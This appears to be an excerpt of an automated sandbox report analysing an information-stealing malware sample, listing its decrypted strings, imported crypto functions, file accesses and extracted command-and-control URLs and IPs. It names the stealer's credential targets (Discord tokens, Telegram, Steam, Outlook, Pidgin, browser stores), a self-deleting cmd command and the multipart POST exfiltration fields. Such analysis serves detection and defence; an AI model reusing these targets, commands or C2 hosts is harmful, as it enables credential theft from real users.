                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: DisplayName
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: DisplayVersion
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Network Info:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: - IP: IP?
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: - Country: ISO?
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: System Summary:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: - HWID:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: - OS:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: - Architecture:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: - UserName:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: - Computer Name:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: - Local Time:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: - UTC:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: - Language:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: - Keyboards:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: - Laptop:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: - Running Path:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: - CPU:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: - Threads:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: - Cores:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: - RAM:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: - Display Resolution:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: - GPU:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: User Agents:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Installed Apps:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: All Users:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Current User:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Process List:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: system_info.txt
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: freebl3.dll
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: mozglue.dll
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: msvcp140.dll
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: nss3.dll
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: softokn3.dll
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: vcruntime140.dll
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: \Temp\
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: .exe
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: runas
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: open
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: /c start
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: %DESKTOP%
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: %APPDATA%
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: %LOCALAPPDATA%
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: %USERPROFILE%
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: %DOCUMENTS%
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: %PROGRAMFILES_86%
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: %RECENT%
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: *.lnk
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: files
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: \discord\
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: \Local Storage\leveldb\CURRENT
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: \Local Storage\leveldb
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: \Telegram Desktop\
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: key_datas
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: D877F783D5D3EF8C*
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: map*
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: A7FDF864FBC10B77*
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: A92DAA6EA6F891F2*
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: F8806DD0C461824F*
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Telegram
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Tox
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: *.tox
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: *.ini
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Password
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: 00000001
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: 00000002
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: 00000003
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: 00000004
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: \Outlook\accounts.txt
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Pidgin
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: \.purple\
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: accounts.xml
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: dQw4w9WgXcQ
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: token:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Software\Valve\Steam
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: SteamPath
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: \config\
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: ssfn*
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: config.vdf
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: DialogConfig.vdf
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: DialogConfigOverlay*.vdf
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: libraryfolders.vdf
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: loginusers.vdf
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: \Steam\
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: sqlite3.dll
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: done
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: soft
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: \Discord\tokens.txt
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: /c timeout /t 5 & del /f /q "
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: C:\Windows\system32\cmd.exe
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: https
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: POST
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: HTTP/1.1
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Content-Disposition: form-data; name="
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: hwid
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: build
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: token
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: file_name
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: file
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: message
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: screenshot.jpg
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4BA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,3_2_6C4BA9A0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4B4440 PK11_PrivDecrypt,3_2_6C4B4440
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C484420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,3_2_6C484420
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4B44C0 PK11_PubEncrypt,3_2_6C4B44C0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C5025B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,3_2_6C5025B0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4BA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,3_2_6C4BA650
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C498670 PK11_ExportEncryptedPrivKeyInfo,3_2_6C498670
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C49E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,3_2_6C49E6E0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4DA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,3_2_6C4DA730
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4E0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,3_2_6C4E0180
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4B43B0 PK11_PubEncryptPKCS1,PR_SetError,3_2_6C4B43B0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4D7C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,3_2_6C4D7C00
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C497D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,3_2_6C497D60
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4DBD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,3_2_6C4DBD30
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4D9EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,3_2_6C4D9EC0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4B3FF0 PK11_PrivDecryptPKCS1,3_2_6C4B3FF0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4B9840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,3_2_6C4B9840
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4B3850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,3_2_6C4B3850
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4DDA40 SEC_PKCS7ContentIsEncrypted,3_2_6C4DDA40
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4B3560 PK11_Decrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,3_2_6C4B3560
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4AF050 PR_smprintf,SEC_CertNicknameConflict,strlen,realloc,memset,realloc,strlen,free,PR_smprintf,memcpy,PORT_NewArena_Util,PR_SetError,PORT_FreeArena_Util,PR_SetError,PORT_NewArena_Util,PR_SetError,PORT_FreeArena_Util,PORT_NewArena_Util,PR_SetError,PORT_FreeArena_Util,memcpy,PORT_NewArena_Util,PR_SetError,PORT_FreeArena_Util,PR_SetError,PR_SetError,PR_GetCurrentThread,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,PK11_GenerateRandom,SECKEY_DestroyPrivateKey,PR_SetError,free,free,free,free,PK11_FindCertInSlot,PORT_NewArena_Util,free,PK11_ImportCert,PR_SetError,free,CERT_DestroyCertificate,PORT_FreeArena_Util,PR_GetCurrentThread,PORT_ArenaAlloc_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_GetCurrentThread,strlen,PR_SetError,PR_GetCurrentThread,PK11_HasAttributeSet,PK11_HasAttributeSet,PK11_HasAttributeSet,PK11_HasAttributeSet,PK11_HasAttributeSet,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,PR_SetError,free,SECKEY_DestroyPrivateKey,SECKEY_DestroyEncryptedPrivateKeyInfo,PR_SetError,3_2_6C4AF050

                                    Phishing

                                    barindex
                                    Yara detected obfuscated html page
                                    Source: Yara matchFile source: C:\Temp\.gif, type: DROPPED
                                    Source: Yara matchFile source: C:\Temp\5ZycQXqae.txt, type: DROPPED
                                    Source: Yara matchFile source: C:\Temp\3GEgnMlRi.txt, type: DROPPED
                                    Source: EdYEXasNiR.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile opened: C:\Users\user\AppData\Local\Temp\_MEI75642\msvcr90.dll
                                    Source: Binary string: mozglue.pdbP source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2229492961.000000006F8ED000.00000002.00000001.01000000.0000000E.sdmp
                                    Source: Binary string: nss3.pdb@ source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                    Source: Binary string: C:\Users\Dan\source\repos\gamee\gamee\obj\Debug\gamee.pdb source: skotes.exe, 00000012.00000003.6196619100.000000000148A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmp, cbfb8a9c89.exe, 0000001D.00000000.2226147614.0000000000C32000.00000002.00000001.01000000.00000011.sdmp
                                    Source: Binary string: nss3.pdb source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                    Source: Binary string: mozglue.pdb source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2229492961.000000006F8ED000.00000002.00000001.01000000.0000000E.sdmp
                                    Source: Binary string: C:\Admin\Workspace\1766103906\Project\Release\Project.pdb source: 696689ce6d.exe, 0000002F.00000003.4293663574.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000000.2339203126.0000000000F7C000.00000002.00000001.01000000.00000016.sdmp, 696689ce6d.exe, 0000002F.00000002.4903441825.0000000000F7C000.00000002.00000001.01000000.00000016.sdmp
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeDirectory queried: number of queries: 1001
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C585070 strlen,PR_SetError,strcpy,_mbsdec,strlen,_mbsinc,_mbsinc,FindFirstFileA,GetLastError,3_2_6C585070
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

                                    Software Vulnerabilities

                                    barindex
                                    Suspicious execution chain found
                                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    Source: chrome.exeMemory has grown: Private usage: 0MB later: 30MB

                                    Networking

                                    barindex
                                    C2 URLs / IPs found in malware configuration
                                    Source: Malware configuration extractorURLs: http://185.215.113.206/c4becf79229cb002.php
                                    Source: Malware configuration extractorURLs: wholersorie.shop
                                    Source: Malware configuration extractorURLs: framekgirus.shop
                                    Source: Malware configuration extractorURLs: cloudewahsj.shop
                                    Source: Malware configuration extractorURLs: tirepublicerj.shop
                                    Source: Malware configuration extractorURLs: noisycuttej.shop
                                    Source: Malware configuration extractorURLs: abruptyopsn.shop
                                    Source: Malware configuration extractorURLs: fancywaxxers.shop
                                    Source: Malware configuration extractorURLs: rabidcowse.shop
                                    Source: Malware configuration extractorURLs: nearycrepso.shop
                                    Source: Malware configuration extractorIPs: 185.215.113.43
                                    Creates HTML files with .exe extension (expired dropper behavior)
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: 568p2nk.exe.18.dr
                                    Source: Joe Sandbox ViewIP Address: 185.215.113.43 185.215.113.43
                                    Source: Joe Sandbox ViewIP Address: 172.67.157.254 172.67.157.254
                                    Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C46CC60 PR_Recv,3_2_6C46CC60
